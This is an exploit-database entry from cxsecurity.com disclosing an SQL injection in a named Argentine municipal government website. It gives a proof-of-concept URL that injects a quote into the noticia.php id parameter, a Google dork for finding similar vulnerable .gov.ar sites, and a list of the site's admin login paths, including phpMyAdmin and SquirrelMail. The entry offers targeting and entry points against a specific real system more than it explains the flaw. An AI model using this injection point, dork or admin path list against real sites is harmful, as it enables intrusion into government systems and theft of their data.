Laprida Gobierno Municipal (SQL Injection)

2019.09.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Exploit Title: Laprida Gobierno Municipal (SQL Injection) Discovered By: intrackeable Date: 12/09/2019 Tested On: Linux Kubuntu Google Dork: "inurl:.php?id= site:.gov.ar" Category: WebApps Vulnerability Type: CWE-89 Vendor Home Page: laprida.gov.ar PoC: http://laprida.gov.ar/noticia.php?id=383%27 Admin Login Paths: http://laprida.gov.ar:2222 http://laprida.gov.ar/squirrelmail http://laprida.gov.ar/phpmyadmin http://laprida.gov.ar/pwadmin


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top